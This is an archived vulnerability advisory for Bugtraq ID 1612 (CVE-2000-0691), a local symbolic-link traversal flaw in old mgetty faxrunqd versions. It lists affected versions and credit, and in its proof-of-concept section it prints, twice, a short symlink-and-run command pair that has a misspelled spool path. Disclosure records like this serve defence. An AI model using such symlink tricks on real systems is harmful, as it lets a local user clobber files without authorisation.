Multiple Vendor mgetty Symbolic Link Traversal Vulnerability
BID:1612
Info
Multiple Vendor mgetty Symbolic Link Traversal Vulnerability
| Bugtraq ID: | 1612 |
| Class: | Unknown |
| CVE: |
CVE-2000-0691 |
| Remote: | No |
| Local: | Yes |
| Published: | Aug 25 2000 12:00AM |
| Updated: | Jul 11 2009 02:56AM |
| Credit: | This vulnerability was posted to the Bugtraq mailing list on August 25, 2000 by Stan Bubrouski<[email protected]> |
| Vulnerable: |
Gert Doering mgetty 1.22.8 Gert Doering mgetty 1.1.21 Gert Doering mgetty 1.1.20 Gert Doering mgetty 1.1.19 |
| Not Vulnerable: | |
Exploit / POC
Multiple Vendor mgetty Symbolic Link Traversal Vulnerability
ln -s /TEST /var/spoo/fax/outgoing/.lastrun
faxrunqd -l ttyS0
ln -s /TEST /var/spoo/fax/outgoing/.lastrun
faxrunqd -l ttyS0
References
Multiple Vendor mgetty Symbolic Link Traversal Vulnerability
References:
References:
- Mgetty + Sendfax Documentation Centre (Gert Doering)